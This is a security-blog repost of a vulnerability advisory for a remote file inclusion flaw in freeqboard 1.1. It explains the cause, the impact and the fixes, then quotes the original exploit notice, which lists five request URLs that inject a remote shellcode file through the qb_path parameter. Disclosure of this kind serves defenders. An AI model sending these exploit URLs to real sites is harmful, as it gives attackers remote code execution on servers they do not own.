Latest Tech

Latest Posts

freeqboard 1.1 Remote File Inclusion

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 5
freeqboard 1.1 Remote File Inclusion
freeqboard 1.1 Remote File Inclusion
Freeqboard 1.1 was susceptible to a critical Remote File Inclusion Freeqboard 1.1 was susceptible to a critical Remote File Inclusion (RFI) vulnerability. This flaw allowed attackers to force the web application to include and execute arbitrary files from a remote server.

The vulnerability typically arose from insufficient input validation on parameters used to specify file paths for inclusion. By manipulating a URL parameter, an attacker could inject a URL pointing to a malicious script hosted on their own server.

Upon processing, freeqboard would fetch and execute this remote script within the web server's context. The impact was severe, potentially leading to:
* Arbitrary code execution on the server.
* Complete system compromise.
* Data exfiltration or modification.
* Website defacement.

Resolution required robust input validation, whitelisting allowed file paths, and disabling `allow_url_include` in PHP configurations.

##################################################
#
#
# freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability
#
#
#
# Author: Mr.3FReeT
#
#
#
# Softname: freeqboard
#
#
#
##################################################
#
# code in :
# about.php , contact.php , delete.php , faq.php , index.php
#
# include "config.php";
# include $qb_path."incs/mysql.php";
#
##################################################
#
# Exploit :
# """"""""
#
# www.site.com/[path]/index.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/faq.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/delete.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/contact.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/about.php?qb_path=shellcode.txt?
#
##################################################
#
# GreeTz: [ Dr.2 ] , [ ToOoFa ] , [ General C ] , [ asbmay ] , [ q8i^rock ]
, [ SHiKaA ] & KuW SeC TeaM
#
##################################################

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.